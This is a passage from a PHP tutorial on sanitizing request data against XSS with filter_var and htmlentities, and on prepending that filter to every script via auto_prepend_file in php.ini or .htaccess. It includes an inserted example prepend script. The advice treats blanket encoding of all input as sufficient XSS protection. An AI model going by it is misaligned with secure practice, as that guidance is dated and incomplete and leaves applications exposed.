2) Using Filters in PHP - Filter is a very useful extension in PHP and you should use it in order to provide better security to your code. There are mainly two types of filters in PHP.
Validate Filters - This set of filters is used to validate or check whether data meets a certain pattern or qualification. An example is validating whether the user has entered a valid email. An email has a pattern like [email protected] etc. You can validate it by writing your own algorithm or by using the filter functions in PHP; for email you have the FILTER_VALIDATE_EMAIL filter. For more info on Filters please follow http://php.net/manual/en/book.filter.php.
Sanitize Filters - Sanitization filters sanitize data by either encoding data or removing special characters. There are many sanitization filters and you can use them as per your requirement.
For filtering data to stop XSS we will be using FILTER_SANITIZE_ENCODED. Just try out this filter and you will see the results and differences. This will help you in blocking XSS attacks.
Now here is the code for implementing this filter:
$_GET[$key] = filter_var($value, FILTER_SANITIZE_ENCODED);
Just put this code inside the foreach loop.
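Putting the capture loop and both sanitizing approaches together, here is a complete prepend script as an added example (not the article's own code); the file name filter_prepend.php, the $mode switch and the helper names are my own choices. It also handles nested request arrays, which the single-level foreach above does not, and adds an email validation helper using FILTER_VALIDATE_EMAIL.

```php
<?php
// filter_prepend.php (added example, not from the article): sanitize every
// value in $_GET, $_POST and $_REQUEST before the application script runs.
// $mode selects one of the two approaches described above:
//   'entities' -> htmlentities()            ("<script>" becomes "&lt;script&gt;")
//   'encoded'  -> FILTER_SANITIZE_ENCODED   ("<script>" becomes "%3Cscript%3E")

function sanitizeValue($value, string $mode = 'entities')
{
    // Request values can be nested arrays (e.g. ?ids[]=1&ids[]=2), so recurse.
    if (is_array($value)) {
        $clean = [];
        foreach ($value as $k => $v) {
            $clean[$k] = sanitizeValue($v, $mode);
        }
        return $clean;
    }
    if ($mode === 'encoded') {
        // URL-encodes everything except letters, digits and -._ characters.
        return filter_var((string) $value, FILTER_SANITIZE_ENCODED);
    }
    // ENT_QUOTES also encodes single quotes; the charset is stated explicitly.
    return htmlentities((string) $value, ENT_QUOTES, 'UTF-8');
}

// Walk one request array in place; the same function serves all three.
function sanitizeRequestArray(array &$request, string $mode = 'entities'): void
{
    if (empty($request)) {
        return;
    }
    foreach ($request as $key => $value) {
        $request[$key] = sanitizeValue($value, $mode);
    }
}

// Validation rather than sanitization: reject a malformed address instead
// of rewriting it. filter_var() returns false when the value does not match.
function isValidEmail($value): bool
{
    return filter_var($value, FILTER_VALIDATE_EMAIL) !== false;
}

// Runs on every request once this file is set as auto_prepend_file.
sanitizeRequestArray($_GET);
sanitizeRequestArray($_POST);
sanitizeRequestArray($_REQUEST);
```

Note that FILTER_SANITIZE_ENCODED also encodes "@" as "%40", so with mode 'encoded' an email address has to be validated with isValidEmail() before the arrays are sanitized, not afterwards.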
Why do we need to automate it?
Now you might be thinking that we can write this code in a single file and include it in each script using require_once inside <?php ?> tags. This approach seems good, but consider the case when you have already worked on your web application and it may contain anywhere from a few hundred scripts to as many as thousands. In this case adding the script to every page will be a tedious job and you may miss some pages. So what can we do? The answer is to automate the prepending of the script. How to do this will be explained in the next section.
How can we automate it in PHP?
I will explain two approaches for automating this in PHP. Both approaches can be used for many things apart from filtering.
1) Using php.ini - As a PHP developer you should know about the php.ini file. php.ini is a configuration file which is used by the Apache server to load the configuration settings for your PHP. Common examples that you might hear of are setting the maximum upload limit, the maximum time to execute a script, registering global variables, etc. But we are more interested in knowing how we can force a script to be prepended to every script that the web application has without touching the code. To do this, open your php.ini file in a text editor and search for auto_prepend_file. Here is a screenshot:
You can append as well as prepend a script; here we need to prepend the script.
Put the absolute path of your filter script, created using the methods explained above, inside the quotes.
Now in order to apply these settings you need to restart your server, because the Apache server reads the php.ini file when it starts to load the PHP configuration.
Now the question is where we should do configuration like this. Your server might be hosting many web applications, so whenever you want your script to be applied to all scripts of all web applications hosted on the server, you should go for the php.ini setting. When you want the setting to apply to a particular web application only, use the approach below.
2) Using .htaccess - .htaccess is a configuration file used by Apache web servers to configure web applications on a per-directory basis. Search for a .htaccess file inside your web application; if it is not available, create one. Whenever a document is requested, the .htaccess file also needs to be loaded, so it may affect your performance.
To implement it, add the following line to the .htaccess file:
php_value auto_prepend_file ""
Put the absolute or relative path of your filter file inside the double quotes. Note that php_value directives in .htaccess only take effect when PHP runs as an Apache module; with a CGI/FastCGI setup the equivalent setting goes in a .user.ini file instead.
In this case you don't need to restart your server.
The .htaccess file can be used for doing a lot of things.
So this is how you can automate request filtering in PHP. We have created a simple filter for stopping XSS; however, you can create your own custom filter using the same approach as per your requirement.
Paras Vij [email protected]